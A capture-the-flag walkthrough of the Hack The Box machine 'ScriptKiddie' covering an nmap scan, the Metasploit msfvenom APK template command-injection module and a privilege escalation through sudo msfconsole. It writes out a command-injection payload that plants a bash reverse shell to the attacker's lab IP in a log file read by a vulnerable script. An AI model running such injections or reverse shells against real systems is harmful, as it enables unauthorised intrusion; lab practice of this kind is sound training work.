Hackthebox - ScriptKiddie

Summary

ScriptKiddie is a Hackthebox Easy Linux machine created by Hackthebox User 0xdf. Initial Enumeration was creating a malicious apk and using that to get a shell. After getting a reverse shell as user of the box. Privilege Escalation was just running sudo msfconsole and then bash to get root.

Enumeration

markdown

# Nmap 7.91 scan initiated Sun Feb  7 12:46:45 2021 as: nmap -sC -sV -oN nmap/scriptkiddie 10.10.10.226
Nmap scan report for 10.10.10.226
Host is up (0.082s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb  7 12:46:57 2021 -- 1 IP address (1 host up) scanned in 12.26 seconds

We now know that the Server is an Ubuntu box. A SSH server on port 22 and a web server on 5000 is open.

Lets poke around 5000 as that have a more potential for Vulnerability.

Web (5000)

we see some kind web interface for nmap msfvenom and searchsploit

trying some command injection in nmap gave invalid ip and on

searchsploit gave

now msfvenom is left lets try some command injection.

trying there also i was not successful.

As we also have searchsploit lets look for any vulnerability on all the tools and saw an possible cmd injection on msfvenom

so using the exploit 49491 we generate a payload but it didn’t work so i used

gams

sudo msfrun db
msf6 > use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.33
LHOST => 10.10.14.33
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[+] msf.apk stored at /root/.msf4/local/msf.apk
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) >

uploading the payload as msf template we get a shell as kid

User (kid)

and we can grab user.txt

Enumerating the box we find

shell

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

reading the code we know we need to get a cmd injection in ip to get me a cmd execution

so from the above script i created a payload which inject in sh and get

bash

1	echo "1 2 ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.33/4444 0>&1' #" > ~/logs/hackers

which get me a shell as pwn

User (pwn)

Checking sudo -l i saw i can run msfconsole without password

so i ran sudo msfconsole and ran bash from that to get a root shell.